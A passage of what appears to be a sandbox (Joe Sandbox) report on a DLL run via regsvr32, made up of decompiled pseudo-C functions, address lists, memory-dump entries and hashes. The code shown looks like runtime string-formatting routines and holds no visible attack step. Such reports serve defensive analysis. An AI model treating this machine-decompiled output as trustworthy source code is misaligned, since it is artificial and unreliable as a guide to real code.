                                                                      				 *((intOrPtr*)(_t268 + 0x10)) =  *((intOrPtr*)(_t268 + 0x10)) + _t289;
                                                                      				 *((char*)( *((intOrPtr*)( *_t290)))) = 0x30;
                                                                      				 *((intOrPtr*)( *_t290)) =  *((intOrPtr*)( *_t290)) + _t289;
                                                                      				if ( *_t274 == 0xffffffff) goto 0x80016af2;
                                                                      				r8d = r8d + r13d;
                                                                      				if (r8d - _t175 < 0) goto 0x80016aad;
                                                                      				if ( *((char*)(__rcx + 0x4c)) == 0) goto 0x80016b64;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x48)) <= 0) goto 0x80016b64;
                                                                      				r14d = 0;
                                                                      				_t81 =  &_v68; // -27
                                                                      				r9d =  *( *(__rcx + 0x40)) & 0x0000ffff;
                                                                      				_t82 =  &_v72; // -31
                                                                      				_v72 = _v72 & 0x00000000;
                                                                      				r8d = 6;
                                                                      				_v88 =  *((intOrPtr*)(__rcx + 8));
                                                                      				if (E0000000118003E4FC( *((intOrPtr*)(__rcx + 8)), __rcx, _t82, _t81, _t278, _t282) != 0) goto 0x80016b5f;
                                                                      				r8d = _v72;
                                                                      				if (r8d == 0) goto 0x80016b5f;
                                                                      				_v88 =  *((intOrPtr*)(_t252 + 8));
                                                                      				_t142 = E00000001180012494(_t141, _t171, _t175, _t252, _t290, _t274, _t276, _t278, _t274);
                                                                      				r14d = r14d + r13d;
                                                                      				if (r14d !=  *(_t252 + 0x48)) goto 0x80016b05;
                                                                      				goto 0x80016b80;
                                                                      				 *_t274 =  *_t274 | 0xffffffff;
                                                                      				goto 0x80016b80;
                                                                      				r8d =  *(_t252 + 0x48);
                                                                      				_t261 = _t290;
                                                                      				_v88 =  *((intOrPtr*)(_t252 + 8));
                                                                      				E00000001180012494(_t142, _t171, _t175, _t252, _t261, _t274, _t276, _t278, _t274);
                                                                      				_t161 =  *_t274;
                                                                      				if (_t161 < 0) goto 0x80016bdd;
                                                                      				if ((r13b &  *(_t252 + 0x28) >> 0x00000002) == 0) goto 0x80016bdd;
                                                                      				r8d = 0;
                                                                      				if (_t175 <= 0) goto 0x80016bdd;
                                                                      				_t272 =  *_t290;
                                                                      				if ( *((intOrPtr*)(_t272 + 0x10)) !=  *((intOrPtr*)(_t272 + 8))) goto 0x80016bb6;
                                                                      				if ( *((char*)(_t272 + 0x18)) == 0) goto 0x80016baf;
                                                                      				goto 0x80016bb2;
                                                                      				 *_t274 = _t161 + 0x00000001 | 0xffffffff;
                                                                      				goto 0x80016bd0;
                                                                      				 *_t274 = _t261 + 1;
                                                                      				 *((intOrPtr*)(_t272 + 0x10)) =  *((intOrPtr*)(_t272 + 0x10)) + _t289;
                                                                      				 *((char*)( *((intOrPtr*)( *_t290)))) = 0x20;
                                                                      				 *((intOrPtr*)( *_t290)) =  *((intOrPtr*)( *_t290)) + _t289;
                                                                      				if ( *_t274 == 0xffffffff) goto 0x80016bdd;
                                                                      				r8d = r8d + r13d;
                                                                      				if (r8d - _t175 < 0) goto 0x80016b98;
                                                                      				return E00000001180002FB0(r13b,  *_t274, _v56 ^ _t279 - 0x00000050);
                                                                      			}


































                                                                      0x180016828
                                                                      0x180016828
                                                                      0x180016828
                                                                      0x180016828
                                                                      0x18001682d
                                                                      0x180016832
                                                                      0x180016840
                                                                      0x180016847
                                                                      0x180016851
                                                                      0x180016855
                                                                      0x180016858
                                                                      0x18001685b
                                                                      0x180016861
                                                                      0x180016864
                                                                      0x180016867
                                                                      0x18001686a
                                                                      0x18001686c
                                                                      0x18001686e
                                                                      0x180016877
                                                                      0x18001687f
                                                                      0x180016883
                                                                      0x18001688b
                                                                      0x180016893
                                                                      0x180016898
                                                                      0x18001689c
                                                                      0x1800168a0
                                                                      0x1800168a8
                                                                      0x1800168b0
                                                                      0x1800168b5
                                                                      0x1800168ba
                                                                      0x1800168bf
                                                                      0x1800168c4
                                                                      0x1800168c9
                                                                      0x1800168cd
                                                                      0x1800168d1
                                                                      0x1800168d5
                                                                      0x1800168d9
                                                                      0x1800168dd
                                                                      0x1800168e1
                                                                      0x1800168e5
                                                                      0x1800168ea
                                                                      0x1800168ee
                                                                      0x1800168f0
                                                                      0x1800168f5
                                                                      0x1800168f7
                                                                      0x1800168fe
                                                                      0x180016905
                                                                      0x180016907
                                                                      0x180016912
                                                                      0x180016914
                                                                      0x180016918
                                                                      0x180016920
                                                                      0x180016925
                                                                      0x180016927
                                                                      0x18001692c
                                                                      0x18001692e
                                                                      0x180016934
                                                                      0x180016939
                                                                      0x180016942
                                                                      0x180016946
                                                                      0x180016952
                                                                      0x18001695b
                                                                      0x180016965
                                                                      0x18001696b
                                                                      0x180016970
                                                                      0x180016976
                                                                      0x180016981
                                                                      0x18001698b
                                                                      0x18001698d
                                                                      0x180016991
                                                                      0x180016996
                                                                      0x180016998
                                                                      0x18001699c
                                                                      0x1800169a5
                                                                      0x1800169a7
                                                                      0x1800169ab
                                                                      0x1800169ae
                                                                      0x1800169ba
                                                                      0x1800169c4
                                                                      0x1800169c6
                                                                      0x1800169c9
                                                                      0x1800169cb
                                                                      0x1800169dc
                                                                      0x1800169e0
                                                                      0x1800169e2
                                                                      0x1800169ea
                                                                      0x1800169ef
                                                                      0x1800169f1
                                                                      0x1800169f4
                                                                      0x180016a02
                                                                      0x180016a08
                                                                      0x180016a0a
                                                                      0x180016a0f
                                                                      0x180016a14
                                                                      0x180016a23
                                                                      0x180016a2a
                                                                      0x180016a2e
                                                                      0x180016a33
                                                                      0x180016a36
                                                                      0x180016a3b
                                                                      0x180016a3e
                                                                      0x180016a4c
                                                                      0x180016a56
                                                                      0x180016a5f
                                                                      0x180016a61
                                                                      0x180016a67
                                                                      0x180016a6d
                                                                      0x180016a6d
                                                                      0x180016a71
                                                                      0x180016a74
                                                                      0x180016a79
                                                                      0x180016a79
                                                                      0x180016a83
                                                                      0x180016a8a
                                                                      0x180016a8f
                                                                      0x180016a9a
                                                                      0x180016aa2
                                                                      0x180016aa4
                                                                      0x180016aa9
                                                                      0x180016aad
                                                                      0x180016ab8
                                                                      0x180016abe
                                                                      0x180016ac2
                                                                      0x180016ac7
                                                                      0x180016ac9
                                                                      0x180016ace
                                                                      0x180016ad0
                                                                      0x180016ada
                                                                      0x180016ae0
                                                                      0x180016ae8
                                                                      0x180016aea
                                                                      0x180016af0
                                                                      0x180016af6
                                                                      0x180016afc
                                                                      0x180016b02
                                                                      0x180016b09
                                                                      0x180016b0d
                                                                      0x180016b12
                                                                      0x180016b16
                                                                      0x180016b1f
                                                                      0x180016b25
                                                                      0x180016b31
                                                                      0x180016b33
                                                                      0x180016b3a
                                                                      0x180016b47
                                                                      0x180016b4f
                                                                      0x180016b54
                                                                      0x180016b5b
                                                                      0x180016b5d
                                                                      0x180016b5f
                                                                      0x180016b62
                                                                      0x180016b6b
                                                                      0x180016b6f
                                                                      0x180016b76
                                                                      0x180016b7b
                                                                      0x180016b80
                                                                      0x180016b84
                                                                      0x180016b8f
                                                                      0x180016b91
                                                                      0x180016b96
                                                                      0x180016b98
                                                                      0x180016ba3
                                                                      0x180016ba9
                                                                      0x180016bad
                                                                      0x180016bb2
                                                                      0x180016bb4
                                                                      0x180016bb9
                                                                      0x180016bbb
                                                                      0x180016bc5
                                                                      0x180016bcb
                                                                      0x180016bd3
                                                                      0x180016bd5
                                                                      0x180016bdb
                                                                      0x180016c09

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 45070d0379fa4a0e7a8a784fdcd644d43767aa510c8d9a3e8d50de4e6bf2a365
                                                                      • Instruction ID: 11b42ba8c77758a7c7d904be7e45168017fa63653312a08610ab24c6098b02e0
                                                                      • Opcode Fuzzy Hash: 45070d0379fa4a0e7a8a784fdcd644d43767aa510c8d9a3e8d50de4e6bf2a365
                                                                      • Instruction Fuzzy Hash: 85D1DE32A04E4C86EBAB8F2988403ED27A5E70DBD8F54C215EE45573E5CF35CA8AC741
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 58%
                                                                      			E00000001180013044(void* __edi, long long __rbx, void* __rcx, long long __rdi, long long __rsi, long long _a16, long long _a24, long long _a32) {
                                                                      				void* _v40;
                                                                      				signed int _v56;
                                                                      				char _v68;
                                                                      				char _v70;
                                                                      				signed int _v72;
                                                                      				long long _v88;
                                                                      				void* __rbp;
                                                                      				intOrPtr _t108;
                                                                      				void* _t111;
                                                                      				void* _t140;
                                                                      				unsigned int _t147;
                                                                      				signed char _t148;
                                                                      				unsigned int _t153;
                                                                      				signed int _t159;
                                                                      				void* _t169;
                                                                      				void* _t172;
                                                                      				void* _t173;
                                                                      				signed long long _t231;
                                                                      				void* _t247;
                                                                      				intOrPtr* _t252;
                                                                      				intOrPtr* _t256;
                                                                      				void* _t260;
                                                                      				intOrPtr _t263;
                                                                      				intOrPtr _t267;
                                                                      				signed int* _t269;
                                                                      				void* _t273;
                                                                      				void* _t274;
                                                                      				intOrPtr _t277;
                                                                      				void* _t284;
                                                                      				intOrPtr* _t285;
                                                                      
                                                                      				_t271 = __rsi;
                                                                      				_t169 = __edi;
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rsi;
                                                                      				_a32 = __rdi;
                                                                      				_t273 = _t274;
                                                                      				_t275 = _t274 - 0x50;
                                                                      				_t231 =  *0x80072078; // 0xc949cbcab002
                                                                      				_v56 = _t231 ^ _t274 - 0x00000050;
                                                                      				_t108 =  *((intOrPtr*)(__rcx + 0x39));
                                                                      				_t247 = __rcx;
                                                                      				r13d = 1;
                                                                      				dil = 0x78;
                                                                      				sil = 0x58;
                                                                      				r14b = 0x41;
                                                                      				_t173 = _t108 - 0x64;
                                                                      				if (_t173 > 0) goto 0x800130e7;
                                                                      				if (_t173 == 0) goto 0x8001314a;
                                                                      				if (_t108 == r14b) goto 0x80013157;
                                                                      				if (_t108 == 0x43) goto 0x800130ca;
                                                                      				if (_t108 - 0x44 <= 0) goto 0x80013160;
                                                                      				if (_t108 - 0x47 <= 0) goto 0x80013157;
                                                                      				if (_t108 == 0x53) goto 0x8001310c;
                                                                      				if (_t108 == sil) goto 0x800130dd;
                                                                      				if (_t108 == 0x5a) goto 0x800130d6;
                                                                      				if (_t108 == 0x61) goto 0x80013157;
                                                                      				if (_t108 != 0x63) goto 0x80013160;
                                                                      				E00000001180013418(_t108, _t108 - 0x63, __rcx);
                                                                      				goto 0x8001315c;
                                                                      				E000000011800134DC(__rcx);
                                                                      				goto 0x8001315c;
                                                                      				_t111 = E0000000118001B6DC(r13b, __rcx, __rcx, __rsi, _t273);
                                                                      				goto 0x8001315c;
                                                                      				if (_t111 - 0x67 <= 0) goto 0x80013157;
                                                                      				if (_t111 == 0x69) goto 0x8001314a;
                                                                      				if (_t111 == 0x6e) goto 0x80013143;
                                                                      				if (_t111 == 0x6f) goto 0x80013123;
                                                                      				if (_t111 == 0x70) goto 0x80013113;
                                                                      				if (_t111 == 0x73) goto 0x8001310c;
                                                                      				if (_t111 == 0x75) goto 0x8001314e;
                                                                      				if (_t111 != dil) goto 0x80013160;
                                                                      				goto 0x800130e0;
                                                                      				E00000001180013554(__rcx);
                                                                      				goto 0x8001315c;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 0x10;
                                                                      				 *((intOrPtr*)(__rcx + 0x34)) = 0xb;
                                                                      				goto 0x800130dd;
                                                                      				_t147 =  *(__rcx + 0x28);
                                                                      				if ((r13b & _t147 >> 0x00000005) == 0) goto 0x80013137;
                                                                      				asm("bts ecx, 0x7");
                                                                      				 *(__rcx + 0x28) = _t147;
                                                                      				E0000000118001B8C4(0, __rcx, __rcx, _t271, _t273);
                                                                      				goto 0x8001315c;
                                                                      				E0000000118001389C(__rcx, __rcx);
                                                                      				goto 0x8001315c;
                                                                      				 *(__rcx + 0x28) =  *(__rcx + 0x28) | 0x00000010;
                                                                      				E0000000118001BAAC(0, __rcx, __rcx, _t271, _t273);
                                                                      				goto 0x8001315c;
                                                                      				if (E000000011800135F8(0, __rcx, __rcx, _t271, _t273) != 0) goto 0x80013167;
                                                                      				goto 0x800133e6;
                                                                      				if ( *((char*)(__rcx + 0x38)) != 0) goto 0x800133e3;
                                                                      				_t148 =  *(__rcx + 0x28);
                                                                      				_v72 = 0;
                                                                      				_v70 = 0;
                                                                      				if ((r13b & 0) == 0) goto 0x800131b4;
                                                                      				if ((r13b & 0) == 0) goto 0x80013199;
                                                                      				_v72 = 0x2d;
                                                                      				goto 0x800131b1;
                                                                      				if ((r13b & _t148) == 0) goto 0x800131a4;
                                                                      				_v72 = 0x2b;
                                                                      				goto 0x800131b1;
                                                                      				if ((r13b & 0) == 0) goto 0x800131b4;
                                                                      				_v72 = 0x20;
                                                                      				_t260 = _t284;
                                                                      				r8b =  *((intOrPtr*)(__rcx + 0x39));
                                                                      				if ((r8b - sil & 0x000000df) != 0) goto 0x800131d1;
                                                                      				if ((r13b & _t148 >> 0x00000005) == 0) goto 0x800131d1;
                                                                      				r9b = r13b;
                                                                      				goto 0x800131d4;
                                                                      				r9b = 0;
                                                                      				_t132 = r8b - r14b;
                                                                      				if (r9b != 0) goto 0x800131e8;
                                                                      				if ((r8b - r14b & 0xffffff00 | (_t132 & 0x000000df) == 0x00000000) == 0) goto 0x80013203;
                                                                      				 *((char*)(_t273 + _t260 - 0x20)) = 0x30;
                                                                      				if (r8b == sil) goto 0x800131f7;
                                                                      				if (r8b != r14b) goto 0x800131fa;
                                                                      				dil = sil;
                                                                      				 *((intOrPtr*)(_t273 + _t260 - 0x1f)) = dil;
                                                                      				_t172 =  *((intOrPtr*)(__rcx + 0x2c)) -  *((intOrPtr*)(__rcx + 0x48));
                                                                      				if ((_t148 & 0x0000000c) != 0) goto 0x8001326f;
                                                                      				r9d = 0;
                                                                      				if (_t172 <= 0) goto 0x8001326f;
                                                                      				_t277 =  *((intOrPtr*)(__rcx + 0x460));
                                                                      				if ( *((intOrPtr*)(_t277 + 0x10)) !=  *((intOrPtr*)(_t277 + 8))) goto 0x8001323e;
                                                                      				if ( *((char*)(_t277 + 0x18)) == 0) goto 0x80013236;
                                                                      				goto 0x80013239;
                                                                      				 *(__rcx + 0x20) =  *(__rcx + 0x20) + 0x00000001 | 0xffffffff;
                                                                      				goto 0x80013262;
                                                                      				 *(__rcx + 0x20) = __rcx + 1;
                                                                      				 *((intOrPtr*)(_t277 + 0x10)) =  *((intOrPtr*)(_t277 + 0x10)) + _t284;
                                                                      				 *((char*)( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x460)))))) = 0x20;
                                                                      				 *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x460)))) =  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x460)))) + _t284;
                                                                      				if ( *(__rcx + 0x20) == 0xffffffff) goto 0x8001326f;
                                                                      				r9d = r9d + r13d;
                                                                      				if (r9d - _t172 < 0) goto 0x8001321a;
                                                                      				_t60 = _t247 + 0x20; // 0x98
                                                                      				_t269 = _t60;
                                                                      				r8d = 0;
                                                                      				_v88 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_t62 = _t247 + 0x460; // 0x4d8
                                                                      				_t285 = _t62;
                                                                      				_t252 = _t285;
                                                                      				E00000001180012494(__rcx + 1, _t169, _t172, __rcx, _t252, _t269, _t271, _t273, _t269);
                                                                      				_t153 =  *(__rcx + 0x28);
                                                                      				if ((r13b & _t153 >> 0x00000003) == 0) goto 0x800132f8;
                                                                      				if ((r13b & _t153 >> 0x00000002) != 0) goto 0x800132f8;
                                                                      				r8d = 0;
                                                                      				if (_t172 <= 0) goto 0x800132f8;
                                                                      				_t263 =  *_t285;
                                                                      				if ( *((intOrPtr*)(_t263 + 0x10)) !=  *((intOrPtr*)(_t263 + 8))) goto 0x800132d1;
                                                                      				if ( *((char*)(_t263 + 0x18)) == 0) goto 0x800132ca;
                                                                      				goto 0x800132cd;
                                                                      				 *_t269 =  *_t269 + 0x00000001 | 0xffffffff;
                                                                      				goto 0x800132eb;
                                                                      				 *_t269 = _t252 + 1;
                                                                      				 *((intOrPtr*)(_t263 + 0x10)) =  *((intOrPtr*)(_t263 + 0x10)) + _t284;
                                                                      				 *((char*)( *((intOrPtr*)( *_t285)))) = 0x30;
                                                                      				 *((intOrPtr*)( *_t285)) =  *((intOrPtr*)( *_t285)) + _t284;
                                                                      				if ( *_t269 == 0xffffffff) goto 0x800132f8;
                                                                      				r8d = r8d + r13d;
                                                                      				if (r8d - _t172 < 0) goto 0x800132b3;
                                                                      				if ( *((char*)(__rcx + 0x4c)) == 0) goto 0x8001336a;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x48)) <= 0) goto 0x8001336a;
                                                                      				r14d = 0;
                                                                      				_t79 =  &_v68; // -27
                                                                      				r9d =  *( *(__rcx + 0x40)) & 0x0000ffff;
                                                                      				_t80 =  &_v72; // -31
                                                                      				_v72 = _v72 & 0x00000000;
                                                                      				r8d = 6;
                                                                      				_v88 =  *((intOrPtr*)(__rcx + 8));
                                                                      				if (E0000000118003E4FC( *((intOrPtr*)(__rcx + 8)), __rcx, _t80, _t79, _t273, _t277) != 0) goto 0x80013365;
                                                                      				r8d = _v72;
                                                                      				if (r8d == 0) goto 0x80013365;
                                                                      				_v88 =  *((intOrPtr*)(_t247 + 8));
                                                                      				_t140 = E00000001180012494(_t139, _t169, _t172, _t247, _t285, _t269, _t271, _t273, _t269);
                                                                      				r14d = r14d + r13d;
                                                                      				if (r14d !=  *(_t247 + 0x48)) goto 0x8001330b;
                                                                      				goto 0x80013386;
                                                                      				 *_t269 =  *_t269 | 0xffffffff;
                                                                      				goto 0x80013386;
                                                                      				r8d =  *(_t247 + 0x48);
                                                                      				_t256 = _t285;
                                                                      				_v88 =  *((intOrPtr*)(_t247 + 8));
                                                                      				E00000001180012494(_t140, _t169, _t172, _t247, _t256, _t269, _t271, _t273, _t269);
                                                                      				_t159 =  *_t269;
                                                                      				if (_t159 < 0) goto 0x800133e3;
                                                                      				if ((r13b &  *(_t247 + 0x28) >> 0x00000002) == 0) goto 0x800133e3;
                                                                      				r8d = 0;
                                                                      				if (_t172 <= 0) goto 0x800133e3;
                                                                      				_t267 =  *_t285;
                                                                      				if ( *((intOrPtr*)(_t267 + 0x10)) !=  *((intOrPtr*)(_t267 + 8))) goto 0x800133bc;
                                                                      				if ( *((char*)(_t267 + 0x18)) == 0) goto 0x800133b5;
                                                                      				goto 0x800133b8;
                                                                      				 *_t269 = _t159 + 0x00000001 | 0xffffffff;
                                                                      				goto 0x800133d6;
                                                                      				 *_t269 = _t256 + 1;
                                                                      				 *((intOrPtr*)(_t267 + 0x10)) =  *((intOrPtr*)(_t267 + 0x10)) + _t284;
                                                                      				 *((char*)( *((intOrPtr*)( *_t285)))) = 0x20;
                                                                      				 *((intOrPtr*)( *_t285)) =  *((intOrPtr*)( *_t285)) + _t284;
                                                                      				if ( *_t269 == 0xffffffff) goto 0x800133e3;
                                                                      				r8d = r8d + r13d;
                                                                      				if (r8d - _t172 < 0) goto 0x8001339e;
                                                                      				return E00000001180002FB0(r13b,  *_t269, _v56 ^ _t275);
                                                                      			}

































                                                                      0x180013044
                                                                      0x180013044
                                                                      0x180013044
                                                                      0x180013049
                                                                      0x18001304e
                                                                      0x18001305c
                                                                      0x18001305f
                                                                      0x180013063
                                                                      0x18001306d
                                                                      0x180013071
                                                                      0x180013074
                                                                      0x180013077
                                                                      0x18001307d
                                                                      0x180013080
                                                                      0x180013083
                                                                      0x180013086
                                                                      0x180013088
                                                                      0x18001308a
                                                                      0x180013093
                                                                      0x18001309b
                                                                      0x18001309f
                                                                      0x1800130a7
                                                                      0x1800130af
                                                                      0x1800130b4
                                                                      0x1800130b8
                                                                      0x1800130bc
                                                                      0x1800130c4
                                                                      0x1800130cc
                                                                      0x1800130d1
                                                                      0x1800130d6
                                                                      0x1800130db
                                                                      0x1800130e0
                                                                      0x1800130e5
                                                                      0x1800130e9
                                                                      0x1800130ed
                                                                      0x1800130f1
                                                                      0x1800130f5
                                                                      0x1800130f9
                                                                      0x1800130fd
                                                                      0x180013101
                                                                      0x180013106
                                                                      0x18001310a
                                                                      0x18001310c
                                                                      0x180013111
                                                                      0x180013113
                                                                      0x18001311a
                                                                      0x180013121
                                                                      0x180013123
                                                                      0x18001312e
                                                                      0x180013130
                                                                      0x180013134
                                                                      0x18001313c
                                                                      0x180013141
                                                                      0x180013143
                                                                      0x180013148
                                                                      0x18001314a
                                                                      0x180013150
                                                                      0x180013155
                                                                      0x18001315e
                                                                      0x180013162
                                                                      0x18001316b
                                                                      0x180013171
                                                                      0x180013176
                                                                      0x18001317c
                                                                      0x180013187
                                                                      0x180013191
                                                                      0x180013193
                                                                      0x180013197
                                                                      0x18001319c
                                                                      0x18001319e
                                                                      0x1800131a2
                                                                      0x1800131ab
                                                                      0x1800131ad
                                                                      0x1800131b1
                                                                      0x1800131b4
                                                                      0x1800131c0
                                                                      0x1800131ca
                                                                      0x1800131cc
                                                                      0x1800131cf
                                                                      0x1800131d1
                                                                      0x1800131d7
                                                                      0x1800131e2
                                                                      0x1800131e6
                                                                      0x1800131e8
                                                                      0x1800131f0
                                                                      0x1800131f5
                                                                      0x1800131f7
                                                                      0x1800131fa
                                                                      0x180013208
                                                                      0x18001320e
                                                                      0x180013210
                                                                      0x180013215
                                                                      0x18001321a
                                                                      0x180013229
                                                                      0x180013230
                                                                      0x180013234
                                                                      0x180013239
                                                                      0x18001323c
                                                                      0x180013241
                                                                      0x180013244
                                                                      0x180013252
                                                                      0x18001325c
                                                                      0x180013265
                                                                      0x180013267
                                                                      0x18001326d
                                                                      0x180013273
                                                                      0x180013273
                                                                      0x180013277
                                                                      0x18001327a
                                                                      0x18001327f
                                                                      0x18001327f
                                                                      0x180013289
                                                                      0x180013290
                                                                      0x180013295
                                                                      0x1800132a0
                                                                      0x1800132a8
                                                                      0x1800132aa
                                                                      0x1800132af
                                                                      0x1800132b3
                                                                      0x1800132be
                                                                      0x1800132c4
                                                                      0x1800132c8
                                                                      0x1800132cd
                                                                      0x1800132cf
                                                                      0x1800132d4
                                                                      0x1800132d6
                                                                      0x1800132e0
                                                                      0x1800132e6
                                                                      0x1800132ee
                                                                      0x1800132f0
                                                                      0x1800132f6
                                                                      0x1800132fc
                                                                      0x180013302
                                                                      0x180013308
                                                                      0x18001330f
                                                                      0x180013313
                                                                      0x180013318
                                                                      0x18001331c
                                                                      0x180013325
                                                                      0x18001332b
                                                                      0x180013337
                                                                      0x180013339
                                                                      0x180013340
                                                                      0x18001334d
                                                                      0x180013355
                                                                      0x18001335a
                                                                      0x180013361
                                                                      0x180013363
                                                                      0x180013365
                                                                      0x180013368
                                                                      0x180013371
                                                                      0x180013375
                                                                      0x18001337c
                                                                      0x180013381
                                                                      0x180013386
                                                                      0x18001338a
                                                                      0x180013395
                                                                      0x180013397
                                                                      0x18001339c
                                                                      0x18001339e
                                                                      0x1800133a9
                                                                      0x1800133af
                                                                      0x1800133b3
                                                                      0x1800133b8
                                                                      0x1800133ba
                                                                      0x1800133bf
                                                                      0x1800133c1
                                                                      0x1800133cb
                                                                      0x1800133d1
                                                                      0x1800133d9
                                                                      0x1800133db
                                                                      0x1800133e1
                                                                      0x18001340f

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 936f5095562a50c59c1b74ac45fa666c2906f11b56d9cca94c9af5fc9965fba1
                                                                      • Instruction ID: 1002543cc5c09953e8f5e5c4d9144b4c0429fd6033d268908c9461c63b2f844e
                                                                      • Opcode Fuzzy Hash: 936f5095562a50c59c1b74ac45fa666c2906f11b56d9cca94c9af5fc9965fba1
                                                                      • Instruction Fuzzy Hash: 19D1CD72604E4C96FBAA8F2984023ED27A1E74DBC8F148216EE59077D5DF35CA4EC344
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 58%
                                                                      			E0000000118001FE64(void* __edi, long long __rbx, void* __rcx, long long __rdi, long long __rsi, long long _a16, long long _a24, long long _a32) {
                                                                      				void* _v40;
                                                                      				signed int _v56;
                                                                      				char _v68;
                                                                      				char _v70;
                                                                      				signed int _v72;
                                                                      				long long _v88;
                                                                      				void* __rbp;
                                                                      				intOrPtr _t108;
                                                                      				void* _t111;
                                                                      				void* _t140;
                                                                      				unsigned int _t147;
                                                                      				signed char _t148;
                                                                      				unsigned int _t153;
                                                                      				signed int _t159;
                                                                      				void* _t169;
                                                                      				void* _t172;
                                                                      				void* _t173;
                                                                      				signed long long _t231;
                                                                      				void* _t247;
                                                                      				intOrPtr* _t252;
                                                                      				intOrPtr* _t256;
                                                                      				void* _t260;
                                                                      				intOrPtr _t263;
                                                                      				intOrPtr _t267;
                                                                      				signed int* _t269;
                                                                      				void* _t273;
                                                                      				void* _t274;
                                                                      				intOrPtr _t277;
                                                                      				void* _t284;
                                                                      				intOrPtr* _t285;
                                                                      
                                                                      				_t271 = __rsi;
                                                                      				_t169 = __edi;
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rsi;
                                                                      				_a32 = __rdi;
                                                                      				_t273 = _t274;
                                                                      				_t275 = _t274 - 0x50;
                                                                      				_t231 =  *0x80072078; // 0xc949cbcab002
                                                                      				_v56 = _t231 ^ _t274 - 0x00000050;
                                                                      				_t108 =  *((intOrPtr*)(__rcx + 0x39));
                                                                      				_t247 = __rcx;
                                                                      				r13d = 1;
                                                                      				dil = 0x78;
                                                                      				sil = 0x58;
                                                                      				r14b = 0x41;
                                                                      				_t173 = _t108 - 0x64;
                                                                      				if (_t173 > 0) goto 0x8001ff07;
                                                                      				if (_t173 == 0) goto 0x8001ff6a;
                                                                      				if (_t108 == r14b) goto 0x8001ff77;
                                                                      				if (_t108 == 0x43) goto 0x8001feea;
                                                                      				if (_t108 - 0x44 <= 0) goto 0x8001ff80;
                                                                      				if (_t108 - 0x47 <= 0) goto 0x8001ff77;
                                                                      				if (_t108 == 0x53) goto 0x8001ff2c;
                                                                      				if (_t108 == sil) goto 0x8001fefd;
                                                                      				if (_t108 == 0x5a) goto 0x8001fef6;
                                                                      				if (_t108 == 0x61) goto 0x8001ff77;
                                                                      				if (_t108 != 0x63) goto 0x8001ff80;
                                                                      				E00000001180020238(_t108, _t108 - 0x63, __rcx);
                                                                      				goto 0x8001ff7c;
                                                                      				E000000011800202FC(__rcx);
                                                                      				goto 0x8001ff7c;
                                                                      				_t111 = E00000001180027714(r13b, __rcx, __rcx, __rsi, _t273);
                                                                      				goto 0x8001ff7c;
                                                                      				if (_t111 - 0x67 <= 0) goto 0x8001ff77;
                                                                      				if (_t111 == 0x69) goto 0x8001ff6a;
                                                                      				if (_t111 == 0x6e) goto 0x8001ff63;
                                                                      				if (_t111 == 0x6f) goto 0x8001ff43;
                                                                      				if (_t111 == 0x70) goto 0x8001ff33;
                                                                      				if (_t111 == 0x73) goto 0x8001ff2c;
                                                                      				if (_t111 == 0x75) goto 0x8001ff6e;
                                                                      				if (_t111 != dil) goto 0x8001ff80;
                                                                      				goto 0x8001ff00;
                                                                      				E00000001180020374(__rcx);
                                                                      				goto 0x8001ff7c;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 0x10;
                                                                      				 *((intOrPtr*)(__rcx + 0x34)) = 0xb;
                                                                      				goto 0x8001fefd;
                                                                      				_t147 =  *(__rcx + 0x28);
                                                                      				if ((r13b & _t147 >> 0x00000005) == 0) goto 0x8001ff57;
                                                                      				asm("bts ecx, 0x7");
                                                                      				 *(__rcx + 0x28) = _t147;
                                                                      				E000000011800278FC(0, __rcx, __rcx, _t271, _t273);
                                                                      				goto 0x8001ff7c;
                                                                      				E000000011800206BC(__rcx, __rcx);
                                                                      				goto 0x8001ff7c;
                                                                      				 *(__rcx + 0x28) =  *(__rcx + 0x28) | 0x00000010;
